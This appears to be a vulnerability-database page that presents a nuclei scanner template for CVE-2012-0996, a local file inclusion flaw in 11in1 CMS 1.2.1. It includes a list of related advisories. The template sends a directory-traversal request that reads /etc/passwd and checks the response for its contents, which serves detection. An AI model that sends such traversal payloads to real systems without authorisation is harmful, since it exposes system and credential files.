Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

11in1 CMS 1.2.1 - Local File Inclusion (LFI)

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 44 Views

11in1 CMS 1.2.1 Local File Inclusion allows reading arbitrary files, leading to unauthorized access and potential system compromise. Upgrade to the latest version to mitigate

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2012-0996
15 Feb 201200:00
circl
CVE		CVE-2012-0996
20 Feb 201219:00
cve
Cvelist		CVE-2012-0996
20 Feb 201219:00
cvelist
htbridge		Multiple vulnerabilities in 11in1
25 Jan 201200:00
htbridge
NVD		CVE-2012-0996
24 Feb 201213:55
nvd
OpenVAS		11in1 Cross Site Request Forgery and Local File Include Vulnerabilities
16 Feb 201200:00
openvas
OpenVAS		11in1 Cross Site Request Forgery and Local File Include Vulnerabilities
16 Feb 201200:00
openvas
Packet Storm		11in1 1.2.1 Stable 12-31-2011 Cross Site Request Forgery / Local File Inclusion
16 Feb 201200:00
packetstorm
Prion		Directory traversal
24 Feb 201213:55
prion
RedhatCVE		CVE-2012-0996
22 May 202502:41
redhatcve
Rows per page
id: CVE-2012-0996

info:
  name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
  author: daffainfo
  severity: medium
  description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and compromise of the affected system.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/36784
    - https://nvd.nist.gov/vuln/detail/CVE-2012-0996
    - https://www.htbridge.ch/advisory/HTB23071
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2012-0996
    cwe-id: CWE-22
    epss-score: 0.10059
    epss-percentile: 0.95029
    cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: 11in1
    product: 11in1
  tags: cve,cve2012,lfi,edb,11in1,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220427172391b5c63eda16d4f5236bbcea7c6bf9aefbd64c7c2994fcac1ae9335a8022043850149935778ccee048ec32dca2ed0484856a6805a607e659f634fdddae521:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 25
EPSS0.10059
cvelfiexploit-db11in1arbitrary filesunauthorized accesssystem compromiseupgradecvss-metrics
44